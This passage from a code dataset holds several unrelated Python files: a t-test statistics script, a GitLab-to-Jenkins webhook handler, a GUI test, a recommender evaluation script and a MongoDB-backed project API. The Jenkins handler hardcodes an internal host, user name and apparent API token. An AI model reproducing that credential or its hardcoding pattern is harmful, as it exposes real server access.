file=fout)\n\n\ndef _calculate_t_statistic(samples_list):\n if len(samples_list) <= 1:\n return None, None\n mean = statistics.mean(samples_list)\n variance = statistics.variance(samples_list)\n if variance == 0.0:\n # Every sample has the same value.\n if mean == 0.0:\n return 0.0, 0.5\n elif mean > 0.0:\n return float('+inf'), 0.0\n else:\n return float('-inf'), 1.0\n\n num_samples = len(samples_list)\n t_statistic = mean / math.sqrt(variance / num_samples)\n degrees_of_freedom = num_samples - 1\n p_value = 1. 
- student_t.cdf(t_statistic, degrees_of_freedom)\n return t_statistic, p_value\n\n\ndef _save_aggreg_stats(output_path, single_sided_p_value_threshold):\n # aggreg_data[(dataset, attribute, criterion)] = [num_times_stat_better_w_missing,\n # num_times_stat_better_wo_missing,\n # num_times_stat_larger_num_nodes]\n aggreg_data = {}\n raw_stats_output_file = os.path.join(output_path, 'raw_t_student_stats.csv')\n has_read_header = False\n with open(raw_stats_output_file, 'r') as fin:\n for line in fin:\n if not has_read_header:\n has_read_header = True\n continue\n line_list = line.split(',')\n\n dataset_name = line_list[0]\n attribute = line_list[1]\n criterion_diff_name = line_list[2]\n criterion_name_1, criterion_name_2 = criterion_diff_name.split(' - ')\n\n if (dataset_name, attribute, criterion_name_1) not in aggreg_data:\n aggreg_data[(dataset_name, attribute, criterion_name_1)] = [0, 0, 0, 0, 0, 0]\n if (dataset_name, attribute, criterion_name_2) not in aggreg_data:\n aggreg_data[(dataset_name, attribute, criterion_name_2)] = [0, 0, 0, 0, 0, 0]\n\n try:\n p_value_w_missing = float(line_list[5])\n if p_value_w_missing <= single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][0] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][3] += 1\n elif p_value_w_missing >= 1. - single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][3] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][0] += 1\n except ValueError:\n pass\n\n try:\n p_value_wo_missing = float(line_list[8])\n if p_value_wo_missing is not None:\n if p_value_wo_missing <= single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][1] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][4] += 1\n elif p_value_wo_missing >= 1. - single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][4] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][1] += 1\n except ValueError:\n pass\n\n try:\n p_value_num_nodes = float(line_list[11])\n if p_value_num_nodes is not None:\n if p_value_num_nodes <= single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][2] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][5] += 1\n elif p_value_num_nodes >= 1. 
- single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][5] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][2] += 1\n except ValueError:\n pass\n\n aggreg_stats_output_file = os.path.join(output_path, 'aggreg_t_student_stats.csv')\n with open(aggreg_stats_output_file, 'w') as fout:\n header = ['Dataset',\n 'Attribute',\n 'Criterion',\n 'Number of times is statistically better with missing values',\n 'Number of times is statistically better without missing values',\n 'Number of times has statistically larger number of nodes',\n 'Number of times is statistically worse with missing values',\n 'Number of times is statistically worse without missing values',\n 'Number of times has statistically smaller number of nodes']\n print(','.join(header), file=fout)\n for keys in sorted(aggreg_data):\n values = map(str, aggreg_data[keys])\n print(','.join([*keys, *values]), file=fout)\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n print('Please include a path to an experiment output folder.')\n sys.exit(1)\n\n main(sys.argv[1].replace(r'\\ ', ' '))\n","sub_path":"t_student.py","file_name":"t_student.py","file_ext":"py","file_size_in_byte":18903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635496325","text":"from mod_python import apache\nfrom mod_python import util\n\nfrom lxml import etree\n\nfrom jenkinsapi import jenkins\nimport json\nimport time\nimport urllib\nimport re\n\nimport logging\nlogging.basicConfig(\n\tfilename='/var/log/gitlab2jenkins/gitlab2jenkins.log',\n\tlevel = logging.DEBUG,\n\tformat='%(asctime)s %(name)s %(filename)s:%(lineno)s %(levelname)s: %(message)s',\n)\n\n# This script connects Gitlab with Jenkins and automatically creates new Jenkins jobs\n# from templates for new branches (currently only release branches, sprint branches and master).\n# See https://redmine/projects/alf/wiki/Continuous_Integration#Automated-Branch-Setup\n\nJENKINS_URL = 'http://jenkins.lan.adytonsystems.com:8080'\nJENKINS_USER = 'jenkins.ci'\nJENKINS_APITOKEN = 'b694f516b0d351ed8b1d72c8258d3aca'\nJENKINS_DESCTEMPLATE = 'Automatically created job for branch %(branch)s of project %(repo)s.'\nJENKINS_DESCTEMPLATE += ' Cloned from template %(template)s.\\n\\n'\nJENKINS_DESCTEMPLATE += 'Do not edit this job!\\nInstead, '\nJENKINS_DESCTEMPLATE += 'edit the template job. Changes to the template will be propagated to all cloned jobs.'\n\nj = None\n\ndef repo(data):\n\t''' Get repo name from Gitlab JSON data. '''\n\treturn data['repository']['name'].lower()\n\ndef branch(data):\n\t''' Get branch name from Gitlab JSON data. '''\n\tref = data['ref']\n\tif ref.startswith('refs/heads/'):\n\t\treturn ref[11:]\n\t# I have no idea if this can happen. Maybe raise an exception?\n\tlogging.error('branch(%s) this should be reached...', ref)\n\treturn ref\n\ndef branch_created(data):\n\t''' Determine from JSON data if a new branch was created. '''\n\treturn int(data['before'], base=16) == 0\n\ndef branch_deleted(data):\n\t''' Determine from JSON data if a branch was deleted. '''\n\treturn int(data['after'], base=16) == 0\n\ndef template_name(kind, data):\n\t''' Get template name for this kind from JSON data. '''\n\treturn 'template-%s-%s' % (kind, repo(data))\n\ndef job_name(kind, data):\n\t''' Get the job name for this kind from JSON data. '''\n\treturn '%s-%s-%s' % (kind, repo(data), branch(data).replace('/', '_'))\n\ndef set_branch(xml, bname):\n\t''' Set the git branch in the given job config XML. 
'''\n\tfor e in xml.iter(tag=etree.Element):\n\t\tif e.tag == 'hudson.plugins.git.BranchSpec':\n\t\t\tfor child in e:\n\t\t\t\tif child.tag == 'name':\n\t\t\t\t\tchild.text = 'origin/%s' % bname\n\ndef gen_description(b, r, tn, data):\n\t''' Generate a nice description for a job. '''\n\tsubs = {\n\t\t'branch': b,\n\t\t'repo': r,\n\t\t'template': tn,\n\t\t'uri': data['repository']['homepage']\n\t}\n\treturn JENKINS_DESCTEMPLATE % subs\n\ndef set_description(xml, desc):\n\t''' Set the job description in the given job config XML. '''\n\tfor child in xml:\n\t\tif child.tag == 'description':\n\t\t\tchild.text = desc\n\ndef set_enabled(xml):\n\t''' Set a job enabled in the given job config XML. '''\n\tfor child in xml:\n\t\tif child.tag == 'disabled':\n\t\t\tchild.text = 'false'\n\ndef view_for_job(job):\n\t''' Determine the view that the given job is in. '''\n\tlogging.debug('all views: %s', ', '.join(j.views))\n\tfor vname in j.views:\n\t\tif vname in ['All', 'Alle']:\n\t\t\tcontinue\n\t\tview = j.views[vname]\n\t\tlogging.debug('view is %s', view)\n\t\tif view and job in view.get_job_dict():\n\t\t\tlogging.debug('found job %s in view %s', job, view)\n\t\t\treturn view\n\treturn None\n\ndef refresh():\n\t''' Reconnect to Jenkins, needed after creating new jobs. '''\n\tglobal j\n\tj = jenkins.Jenkins(JENKINS_URL, JENKINS_USER, JENKINS_APITOKEN)\n\ndef create_job(jobname, template, repo, branch, data):\n\t''' Create a new job. '''\n\tglobal j\n\tcfg = gen_config(jobname, template, repo, branch, data)\n\tnewjob = j.create_job(jobname, cfg)\n\trefresh()\n\tv = view_for_job(template)\n\tif v:\n\t\tv.add_job(jobname, newjob)\n\treturn newjob\n\ndef gen_config(jobname, template, repo, branch, data):\n\t''' Generate an XML job config. '''\n\tglobal j\n\txml = etree.fromstring(j.get_job(template).get_config().encode('utf-8'))\n\tset_branch(xml, branch)\n\tset_enabled(xml)\n\tset_description(xml, gen_description(branch, repo, template, data))\n\treturn etree.tostring(xml, pretty_print=True)\n\ndef handler(req):\n\t''' The actual request handler. '''\n\tglobal j\n\treq.content_type = 'text/plain'\n\t# see https://gitlab/help/web_hooks\n\trequestdata = req.read()\n\tlogging.debug('request data is %s\\n', requestdata)\n\tdata = json.loads(requestdata)\n\tr = repo(data)\n\tb = branch(data)\n\trefresh()\n\tall_jobs = j.get_jobs()\n\tall_views = j.views\n\n\tif not re.match(r'^r[0-9\\.]+(|-s.+)$', b) and not b.startswith('release-'):\n\t\treq.write('branch is neither release, sprint nor story branch. Ignoring.')\n\t\tlogging.info('Branch in neither release, sprint nor story branch %s in repo %s. 
Ignoring.\\n' % (b, r))\n\t\treturn apache.OK\n\n\tkinds = ['ci']\n\tif re.match(r'^r[0-9\\.]+(|-s[0-9_]+)$', b):\n\t\tkinds.append('nightly')\n\n\tlogging.info(\"Handling incoming data: %r\\n\" % data)\n\tlogging.info(\"Extracted: repo %s, branch %s\\n\" % (r,b))\n\t# We have two kinds of jobs, ci (continuous integration) and nightly.\n\tfor kind in kinds:\n\t\ttn = template_name(kind, data)\n\t\tjn = job_name(kind, data)\n\t\tlogging.info(\"Will work with template %s, job %s\\n\" % (tn, jn))\n\n\t\tif not j.has_job(tn):\n\t\t\t# If we don't have a template, there is nothing we can do anyways...\n\t\t\tcontinue\n\n\t\tif False and branch_created(data):\n\t\t\tres = \"Registered new branch %s in repo %s\\n\" % (b, r)\n\t\t\tlogging.info(res)\n\t\t\tjob = create_job(jn, tn, r, b, data)\n\t\t\tif kind != 'nightly':\n\t\t\t\tlogging.info('Will invoke this %s job directly.', kind)\n\t\t\t\tjob.invoke()\n\n\t\telif branch_deleted(data):\n\t\t\tres = \"Registered deleted branch %s in repo %s\\n\" % (b, r)\n\t\t\tlogging.info(res)\n\t\t\tif j.has_job(jn):\n\t\t\t\tj.delete_job(jn)\n\t\telse: # Just a regular commit on an existing branch.\n\t\t\tres = \"Registered commit to %s on branch %s\\n\" % (r, b)\n\t\t\tlogging.info(res)\n\t\t\tif not j.has_job(jn):\n\t\t\t\tjob = create_job(jn, tn, r, b, data)\n\t\t\telse:\n\t\t\t\tjob = j.get_job(jn)\n\t\t\t\tjob.update_config(gen_config(jn, tn, r, b, data))\n\t\t\tif kind != 'nightly':\n\t\t\t\tlogging.info('Will invoke this %s job.', kind)\n\t\t\t\tjob.invoke()\n\n\t\treq.write(res)\n\n\treturn apache.OK\n","sub_path":"gitlab2jenkins.py","file_name":"gitlab2jenkins.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474114316","text":"useFixture(RecordEditor)\r\n\r\ndef test():\r\n\tfrom Modules import commonBits\r\n\tjava_recorded_version = '1.6.0_22'\r\n\r\n\tif window('Record Editor'):\r\n\t\tselect('FileChooser', commonBits.sampleDir() + 'csv_DTAR1000_Store_file_std.bin.csv')\r\n\t\tselect('ComboBox1', 'CSV')\r\n\t\tselect('ComboBox2', 'Generic CSV - enter details')\r\n\t\tclick(commonBits.fl('Edit') + '1')\r\n\r\n\t\tif window(''):\r\n\t\t\tselect('BmKeyedComboBox', commonBits.fl('Parser - Quotes based on field Type'))\r\n\t\t\tclick(commonBits.fl('Go'))\r\n\t\tclose()\r\n\r\n\t\tselect('Table', 'cell:2|REGION-NO,0(20)')\r\n\t\trightclick('Table', '3|STORE-NAME,4')\r\n##\t\tselect('Table', 'cell:2|REGION-NO,0(20)')\r\n\t\tselect_menu(commonBits.fl('Edit Record'))\r\n##\t\tselect('Table1', 'cell:2|REGION-NO,0(20)')\r\n\t\tassert_p('Table', 'Content', '[[STORE-NO, 1, , 5, 5], [REGION-NO, 2, , 20, 20], [STORE-NAME, 3, , V Albury, V Albury], [NEW-STORE, 4, , N, N], [ACTIVE-STORE, 5, , Y, Y], [CLOSED-STORE, 6, , N, N], [DC-TYPE, 7, , N, N], [SRC-TYPE, 8, , N, N], [HO-TYPE, 9, , N, N]]')\r\n\t\tassert_p('TextArea', 'Text', '5\t20\t\"V Albury\"\t\"N\"\t\"Y\"\t\"N\"\t\"N\"\t\"N\"\t\"N\"')\r\n\t\tselect('Table', 'N 1', commonBits.fl('Data') + ',3')\r\n\t\tselect('Table', 'Y 2', commonBits.fl('Data') + ',4')\r\n\t\tselect('Table', 'N 3', commonBits.fl('Data') + ',5')\r\n\t\tselect('Table', 'cell:' + commonBits.fl('Data') + ',6(N)')\r\n\t\tassert_p('Table', 'Content', '[[STORE-NO, 1, , 5, 5], [REGION-NO, 2, , 20, 20], [STORE-NAME, 3, , V Albury, V Albury], [NEW-STORE, 4, , N 1, N 1], [ACTIVE-STORE, 5, , Y 2, Y 2], [CLOSED-STORE, 6, , N 3, N 3], [DC-TYPE, 7, , N, N], [SRC-TYPE, 8, , N, N], [HO-TYPE, 9, , N, N]]')\r\n\t\tselect('Table', 'cell:' + 
commonBits.fl('Data') + ',6(N)')\r\n\t\tassert_p('TextArea', 'Text', '5\t20\t\"V Albury\"\t\"N 1\"\t\"Y 2\"\t\"N 3\"\t\"N\"\t\"N\"\t\"N\"')\r\n\r\n\tclose()\r\n","sub_path":"Build/Instalation/GeneralDb/Marathon/MarathonTests_1.1/linux_HSQLDB_Edit/TestCases/V69_Changes/Csv/CsvQuoteTextFields.py","file_name":"CsvQuoteTextFields.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602523740","text":"import argparse\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\nimport time\r\nimport natsort\r\nfrom pymediainfo import MediaInfo\r\n\r\ndef get_ids(idpath):\r\n ids = dict();\r\n for line in open(idpath):\r\n tid = line.strip();\r\n ids[tid] = len(ids);\r\n return ids;\r\n\r\ndef get_ivt(idpath):\r\n ivt = dict();\r\n for line in open(idpath):\r\n tid = line.strip();\r\n ivt[len(ivt)] = tid;\r\n return ivt;\r\n\r\ndef get_mat(mpath, mids):\r\n mat = None;\r\n lines = open(mpath).readlines();\r\n for mid in mids:\r\n terms = lines[mids[mid]].strip().split(' ');\r\n if mat is None:\r\n mat = np.zeros((len(mids), len(terms)), dtype=np.float32);\r\n for k in range(len(terms)):\r\n mat[mids[mid], k] = np.float32(terms[k]);\r\n return mat;\r\n\r\ndef get_history(hpath):\r\n rated = dict();\r\n popular = dict();\r\n for line in open(hpath):\r\n terms = line.strip().split(',');\r\n uid = terms[0];\r\n rated[uid] = set();\r\n for k in range(1, len(terms)):\r\n vid = terms[k].split(':')[0];\r\n like = int(terms[k].split(':')[1]);\r\n rated[uid].add(vid);\r\n if like == 1:\r\n if vid not in popular:\r\n popular[vid] = 0;\r\n popular[vid] += 1;\r\n return rated, popular;\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description=\"Evaluate weighted matrix factorization based methods.\")\r\n parser.add_argument('-d', '--data', required=True, help=\"The data path for the evaluation\");\r\n parser.add_argument('-m', '--model', required=True, help=\"The work path for the model\");\r\n parser.add_argument('-f', '--fold', type=int, default=0, help=\"The index of evaluation fold\");\r\n parser.add_argument('-s', '--step', type=int, default=5, help=\"The number of evaluation step\");\r\n parser.add_argument('-t', '--total', type=int, default=30, help=\"The number of total predictions\");\r\n parser.add_argument('-sl', '--scenarios', nargs='+', default=None, help=\"The test scenario list\");\r\n args = parser.parse_args();\r\n \r\n uids = get_ids(os.path.join(args.data, 'uid'));\r\n vids = get_ids(os.path.join(args.data, 'vid'));\r\n fold = args.fold;\r\n scenarios = args.scenarios;\r\n step = args.step;\r\n total = args.total;\r\n interval = total // step;\r\n results = dict();\r\n\r\n rated, popular = get_history(os.path.join(args.data, 'f%dtr.txt'%fold));\r\n umat = get_mat(os.path.join(args.model, 'final-U.dat'), uids);\r\n vmat = get_mat(os.path.join(args.model, 'final-V.dat'), vids);\r\n bmat = None;\r\n if os.path.exists(os.path.join(args.model, 'final-B.dat')):\r\n bmat = get_mat(os.path.join(args.model, 'final-B.dat'), vids)\r\n for scenario in scenarios:\r\n teids = get_ids(os.path.join(args.data, 'f%dte.%s.idl'%(fold, scenario)));\r\n teivt = get_ivt(os.path.join(args.data, 'f%dte.%s.idl'%(fold, scenario)));\r\n temat = np.zeros((len(teids), vmat.shape[1]), dtype=np.float32);\r\n for vid in teids:\r\n temat[teids[vid],:] = vmat[vids[vid],:];\r\n scores = np.dot(umat, temat.T);\r\n if bmat is not None:\r\n scores += bmat.reshape((1,-1));\r\n rlist = np.argsort(scores, axis=1);\r\n tresults = 
[0.0]*interval;\r\n tcount = 0;\r\n for line in open(os.path.join(args.data, 'f%dte.%s.txt'%(fold, scenario))):\r\n terms = line.strip().split(',');\r\n uid = terms[0];\r\n likes = set();\r\n idx = 0;\r\n for k in range(1, len(terms)):\r\n vid = terms[k].split(':')[0];\r\n like = int(terms[k].split(':')[1]);\r\n if like == 1:\r\n likes.add(teids[vid]);\r\n if len(likes) != 0:\r\n hits = [0] * interval;\r\n for t in range(len(teids)):\r\n liid = rlist[uids[uid], len(teids)-t-1];\r\n if teivt[liid] not in rated[uid]:\r\n if liid in likes:\r\n j = idx // step;\r\n for k in range(j, interval):\r\n hits[k] += 1;\r\n idx += 1;\r\n if idx == total:\r\n break;\r\n for k in range(interval):\r\n tresults[k] += hits[k];\r\n tcount += len(likes);\r\n if scenario not in results:\r\n results[scenario] = [0.0]*interval;\r\n for k in range(interval):\r\n results[scenario][k] += tresults[k] / tcount;\r\n for scenario in scenarios:\r\n line=scenario\r\n for k in range(interval):\r\n line += ',%.6f'%(results[scenario][k]);\r\n print (line);\r\n\r\nif __name__ == '__main__':\r\n main();\r\n\r\nTestData=\"Test\"\r\nwhile True:\r\n for(direcpath,direcnames,vid_files) in os.walk(TestData):\r\n for v_file in vid_files:\r\n if '.txt' in v_file:\r\n time.sleep(1)\r\n with open(TestData + \"/\" + v_file , 'r') as myfile:\r\n video_id = myfile.read()\r\n data = video_id\r\n data_dir = \"/Users/masoodkhan/Desktop/Project_PVR_using_RC_from_videos/videos\"\r\n files = os.listdir(data_dir)\r\n files = natsort.natsorted(files)\r\n print(\"Top_of K-Recommendation vid:\")\r\n for i in range(len(files)):\r\n file = files[i]\r\n d = file.split(',')\r\n vid = data\r\n b = [s.split(',') for s in d]\r\n if vid in d:\r\n path = data_dir + \"/\" + vid\r\n media_info = MediaInfo.parse(path)\r\n for track in media_info.tracks:\r\n if track.track_type == 'Video':\r\n res = track.width * track.height\r\n data_dir_a = data_dir\r\n files_a = os.listdir(data_dir_a)\r\n files_a = natsort.natsorted(files_a)\r\n for i in range(len(files_a)):\r\n file = files_a[i]\r\n filepath = data_dir_a + \"/\" + file\r\n prefix = file.split('.')[0]\r\n if os.path.isfile(filepath):\r\n media_info = MediaInfo.parse('videos/' + file)\r\n for track in media_info.tracks:\r\n if track.track_type == 'Video':\r\n data_vid_resulation = track.width * track.height\r\n user_vid_resulation = str(res)\r\n all_data_vid_resu = str(data_vid_resulation).split(',')\r\n new_res = user_vid_resulation\r\n resulation_a = [s.split(',') for s in all_data_vid_resu]\r\n if new_res in all_data_vid_resu:\r\n Recommend_vid = file\r\n print(Recommend_vid)\r\n rec = open(\"vid_send.txt\",\"a\")\r\n print(Recommend_vid,file = rec)\r\n rec.close()\r\n #else:\r\n #print(\"not_match_datafile\")\r\n\r\n #------------------------------------------------------------------------------------------#\r\n os.remove(TestData+'/'+v_file)\r\n \r\n\r\n \r\n\r\n","sub_path":"final_display_module_3.py","file_name":"final_display_module_3.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368531207","text":"from .db_basic import dbinit, insert_one, insert_many, find, findCount, find_one, update_one, update_many, copy_database, drop_database, delete_one, check_collection_count, aggregate\nimport json\nimport pymongo\nfrom bson import json_util\nfrom utilities.jwtTools import createJWT, verifyJWT\nfrom myExceptions import AccountNotExistError,PasswordMismatchError\nimport time\n\n# 数据库结构概览:\n# 数据库: 
keywordsManagement\n# ->表: User ,存储账户信息\n# ->表: Project, 存储项目概要信息,但不包含分类信息\n# 数据库: 项目x: 每个项目一个数据库,每个数据库包含如下表\n# ->表: Categories\n# ->表: Urls\n# ->表: Articles\n# ->表: BasicWords\n# ->表: ExtendedWords\n# ->表: stopDict\n# ->表: invalidDict\n# ->表: userDict\n\n# 数据库部分初始化操作\ndbinit()\ndbPrefix = 'KWM'\n\n# Projects 相关 高级 函数\nasync def fetchAllProjects(currentpage=1, pagesize=10):\n # 1- 获取 Project表内容\n result1 = await fetchTable(dbPrefix, 'Project', currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print('result1',result1)\n # result1 形式: result1 = {'count':count,'content':content}\n # 2- 因为category 跟 表 Project 是分开的,所以需要分开查找\n if result1['count'] > 0:\n # 存在项目,才去读项目中的 目录信息\n for project in result1['content']:\n # print('project',project)\n projectId = project['_id']['$oid']\n result2 = await fetchTable(dbPrefix + '-' + projectId, 'Categories', currentpage=0, pagesize=0, returnTotalCount=False)\n # print('xxxxxx',result2)\n project['categories'] = result2['content']\n return result1\n\n\nasync def createnewproject(dbName, collectionName, projectObjectData, currentpage=1, pagesize=10):\n # 1- 在Project表添加新项目,如果已经存在,则报错返回\n categotiesData = projectObjectData.pop('categories')\n try:\n result1 = await insert_one(dbName, collectionName, projectObjectData)\n except Exception as e:\n raise\n else:\n # 插入项目名称 成功\n #print('result1', result1)\n # 2-项目创建成功,则创建以该项目命名的数据库,并将Categories 写入 Categories 表格\n # dbName2 = projectObjectData['projectName']\n # 使用uuid代表真正的项目名称,并创建项目\n dbName2 = str(result1)\n #print('dbName2', dbName2)\n result2 = ''\n if len(categotiesData) > 0:\n # 只有设置了目录元素的时候才进行插入,否则,什么都不做\n # print('dbName2',dbName2)\n try:\n result2 = await insert_many(dbPrefix + '-' + dbName2, 'Categories', categotiesData)\n except Exception as e:\n raise\n #print('result2', result2)\n else:\n result2 = 0\n #print('result2', result2)\n # 如果都成功,返回 新的数据\n return await fetchAllProjects(currentpage=currentpage, pagesize=pagesize)\n\n\nasync def fetchTable(dbName, collectionName, idPrefix=\"\", xfilter={}, xshown={}, xsort=[], currentpage=1, pagesize=10, returnTotalCount=True):\n if returnTotalCount:\n # 1 读取所有项目数目\n result1 = await findCount(dbName, collectionName, xfilter)\n # 此处 result1 肯定是个数字, 0 或者 >0\n else:\n result1 = ''\n\n # 2 读取所有的表信息\n result2 = []\n if (type(result1) == int and result1 > 0) or result1 == '':\n # 1-1: 存在数据,则继续下一步 1-2: 没有计算长度 ,也进入下一步。 否则,直接返回空\n skipValue = (currentpage - 1) * pagesize\n limitValue = pagesize\n result2 = json.loads(await find(dbName, collectionName, xfilter=xfilter, xshown=xshown, xsort=xsort, skipValue=skipValue, limitValue=limitValue))\n # 添加 ID\n initID = 1\n if idPrefix == '':\n for ele in result2:\n ele['id'] = skipValue + initID\n initID += 1\n else:\n # id 西药添加特定前缀\n for ele in result2:\n ele['id'] = str(idPrefix) + '-' + str(skipValue + initID)\n initID += 1\n # print('xxxx',result2)\n return ({'count': result1, 'content': result2})\n\n\nasync def updateProject(dbName, collectionName, queryDict={}, setDict={},currentPage=1, pageSize=10):\n # print(setDict)\n # 1- 更新特定醒目名称信息\n try:\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n except:\n raise\n else:\n # 修改 项目数据库列表成功\n return await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n\n\n\nasync def deleteProject(dbName, collectionName, queryDict={},currentPage=1,pageSize=10):\n projectId = queryDict['_id']\n # 1: 删除项目列表中的 项目名称\n result1 = await delete_one(dbName, collectionName, queryDict)\n if result1 == 1:\n # step1 修改成功\n # 2: 删除项目数据库\n 
projectid = json.loads(json_util.dumps(projectId))['$oid']\n result2 = await drop_database(dbPrefix + '-' + projectid)\n if not result2:\n # 删除数据库成功\n # 3- 拉取所有数据\n result3 = await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n return (result3)\n else:\n return ('error')\n else:\n return ('error')\n\n\nasync def updateCategory(dbName, collectionName, queryDict={}, setDict={},currentPage = 1, pageSize= 10):\n # 更新特定项目中的 目录\n # 1- 更新 对应项目,分类表中的数据\n try:\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n except:\n raise\n else:\n if result1 == 1:\n # 1- 修改 项目数据库列表成功\n # 2- 拉取所有数据\n result2 = await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n return (result2)\n else:\n pass\n\nasync def deleteCategory(dbName, collectionName, queryDict={},currentPage=1,pageSize=10):\n # 1: 删除项目列表中的 项目名称\n try:\n result1 = await delete_one(dbName, collectionName, queryDict=queryDict)\n except:\n raise\n else:\n result2 = await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n return (result2)\n\nasync def createCategory(dbName, collectionName, setDict={},currentPage=1,pageSize=10):\n # 创建 目录\n try:\n result1 = await insert_one(dbName, collectionName, data = setDict)\n except:\n raise\n else:\n # 创建成功,刷新所有 projects信息\n return await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n\nasync def handleSignup(dbName, collectionName, accountInfo):\n \"\"\"\n 处理用户注册\n \"\"\"\n\n # 1 - 直接注册,父函数 根据结果,做出相应 判断\n try:\n result1 = await insert_one(dbName, collectionName, accountInfo)\n except:\n raise\n else:\n return ('注册成功')\n\n\nasync def handleSignin(dbName, collectionName, accountInfo):\n \"\"\"\n 处理用户登录\n \"\"\"\n # 1 检查账号是否存在\n try:\n result1 = await find_one(dbName, collectionName, queryDict={'account': accountInfo['account']})\n except:\n raise\n else:\n if result1 == 'null':\n # 账号不存在,抛出异常\n raise AccountNotExistError(f'账号{accountInfo[\"account\"]}未注册!')\n else:\n # 用户已经注册,继续向下\n # 2- 如果存在,检查账号密码是否一致\n try:\n result2 = await find_one(dbName, collectionName, queryDict={'account': accountInfo['account'], 'shadow': accountInfo['shadow']})\n except:\n raise\n else:\n if result2 == 'null':\n # 账号密码不一致:密码错误\n raise PasswordMismatchError(f'账号{accountInfo[\"account\"]}密码错误,请重试!')\n else:\n # 3- 密码正确, 继续,获取用户部门信息\n try:\n result3 = await find_one(dbName, collectionName, queryDict={'account': accountInfo['account']}, showDict={'_id': 0, 'department': 1})\n except:\n raise\n else:\n # 部门信息ok,生成JWT\n try:\n jwttoken = await createJWT({'name': accountInfo['account']})\n except:\n raise\n else:\n return ({\"username\": accountInfo['account'], \"access_token\": str(jwttoken, 'utf-8'), \"token_type\": \"bearer\", \"department\": json.loads(result3)['department']})\n\n\n# Urls related high level functions\nasync def createUrlItems(dbName, collectionName, currentpage=1, pagesize=10, ItemInfos={}):\n # 直接使用 insert_many\n try:\n result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n except Exception as e:\n raise\n else:\n print('no error')\n # if isinstance(result1, int):\n print('插入成功')\n # 获取所有数据(首页) 返回\n # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n return (result2)\n # else:\n # return(result1)\n\n# async def createUrlItems(dbName, collectionName, ItemInfos):\n# # 直接使用 insert_many\n# result1 = await 
insert_many(dbName, collectionName, ItemInfos)\n#     if isinstance(result1, int):\n#         print('insert succeeded')\n#         # fetch all data (first page) and return it\n#         # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n#         result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=1, pagesize=10, returnTotalCount=True)\n#         return (result2)\n#     else:\n#         return('error')\n\n# async def updateUrlItems(dbName,collectionName,queryDict={},setDict={}):\n#     #print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n#\n\n\nasync def updateUrlItems(dbName, collectionName, queryDict={}, setDict={}, pageSize=10, currentPage=1):\n    # print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n    print('++++++++++++++', dbName, collectionName,\n          setDict, queryDict, pageSize, currentPage)\n    result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n    # print('result1',result1)\n    if result1 == 1:\n        print('update succeeded')\n        # fetch all data (first page) and return it\n        result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n        return (result2)\n\n    else:\n        return(result1)\n\n\nasync def findProjectIdFromProjectName(dbName, collectionName, queryDict={}, showDict={}):\n    print('queryDict', queryDict)\n    result1 = json.loads(await find_one(dbName, collectionName, queryDict, showDict))\n    # print('result1',result1)\n    if result1:\n        projectId = result1['_id']['$oid']\n        return projectId\n    else:\n        return None\n\n\nasync def fetchUrlItems(dbName, collectionName, xfilter={}, xshown={}, currentpage=1, pagesize=10, returnTotalCount=True):\n    # fetch the rows of this project's Urls collection that match the filter\n    result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n    # print(result1,type(result1))\n    return result1\n\n\nasync def deleteUrlItems(dbName, collectionName, deleteDictList=[]):\n    if deleteDictList == []:\n        # nothing to delete\n        return ('error')\n    else:\n        # delete the items one by one\n        try:\n            for ele in deleteDictList:\n                print(ele)\n                result1 = await delete_one(dbName, collectionName, ele)\n            # on success, refresh the list\n            result2 = await fetchTable(dbName, collectionName)\n            return (result2)\n        except:\n            return ('error')\n\n\nasync def getCategories(dbName, collectionName):\n    print(dbName, collectionName)\n    try:\n        result = await fetchTable(dbName, collectionName, xshown={'_id': 0, 'categoryName': 1}, returnTotalCount=False, currentpage=0, 